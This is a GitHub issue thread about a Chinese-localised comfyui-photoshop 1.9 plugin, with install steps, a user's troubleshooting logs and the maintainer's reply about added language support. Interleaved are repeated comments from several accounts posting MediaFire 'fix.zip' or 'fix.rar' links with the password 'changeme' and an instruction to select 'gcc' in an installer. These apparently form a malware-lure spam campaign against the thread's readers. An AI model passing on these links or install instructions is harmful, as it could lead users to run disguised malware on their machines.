### ISSUE TITLE
comfyui-photoshopV1.9中文版，解决预设无法加载问题

### ISSUE THREAD

**Issue by zh2650307** [NimaNzrii/comfyui-photoshop#214]
安装方法
1.复制Plug-ins目录下文件夹到PS安装目录Plug-ins下
2.复制custom_nodes目录下的文件夹【comfyui-photoshop】到comfyui的【custom_nodes】目录下

解决预设不显示问题
3.删除comfyui的【custom_nodes】目录下的翻译插件AIGODLIKE-ComfyUI-Translation
4.复制我提供的AIGODLIKE-ComfyUI-Translation插件版本到comfyui的custom_nodes目录下

[汉化效果演示如下，节点建议大家学习英文版的节点，界面用中文的就行，1.9中文插件文件，在评论区我免费提供给大家，支持作者的点个赞，感谢NimaNzrii作者。]
![0](https://github.com/user-attachments/assets/d26d8479-bd13-466d-9ab0-0069b19f2fb7)
![0-1](https://github.com/user-attachments/assets/6bea5982-9bd6-4bca-9362-8acc9103ab6a)
![1](https://github.com/user-attachments/assets/c626fd4b-87ed-4f1f-8607-c5858f81f9df)
![2](https://github.com/user-attachments/assets/3dcba38f-729b-43dc-9659-e7b4a9f7f403)
![3](https://github.com/user-attachments/assets/ef4dd772-b180-405f-a555-f9c5b305d6e3)
![4](https://github.com/user-attachments/assets/28c7a8e4-f0dc-41b2-b034-a00d50624fd7)
![5](https://github.com/user-attachments/assets/81258f15-ad1f-4514-beac-1aa5c6d1a32c)

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by zh2650307** [comment]
comfyui-photoshop-1.9中文版本：链接: https://pan.baidu.com/s/1JxQ48rPfx9aul0zQIbWiXA?pwd=pexz 提取码: pexz

**Comment by lyscop** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by lyscop** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by lyscop** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by huanli11** [comment]
为什么 我以前插件是不太容易从ps提取图片，现在是ps插件哪里又不显示生成的图片了，我重装都不能解决

**Comment by huanli11** [comment]
更新1.9.1还是不行啊

**Comment by huanli11** [comment]
model_path is D:\AICG\ComfyUI\ComfyUI\custom_nodes\comfyui_controlnet_aux\ckpts\lllyasviel/Annotators\sk_model.pth
model_path is D:\AICG\ComfyUI\ComfyUI\custom_nodes\comfyui_controlnet_aux\ckpts\lllyasviel/Annotators\sk_model2.pth
Warning torch.load doesn't support weights_only on this pytorch version, loading unsafely.
Requested to load ControlNet
Loading 1 new model
loaded completely 0.0 689.0852355957031 True
100%|██████████| 24/24 [00:05<00:00,  4.44it/s]
Use Proxy: http://127.0.0.1:7890

是不是最后错了 我看我插件和comfyui 最后都是http://127.0.0.1:8188

**Comment by lyscop** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Avishake2017** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NimaNzrii** [comment]
## Language Support added✨
update the node and reload the sd1.5 workflow

![Untitled-1](https://github.com/user-attachments/assets/2c069975-0f39-4c6a-a87a-116b9bd58f82)
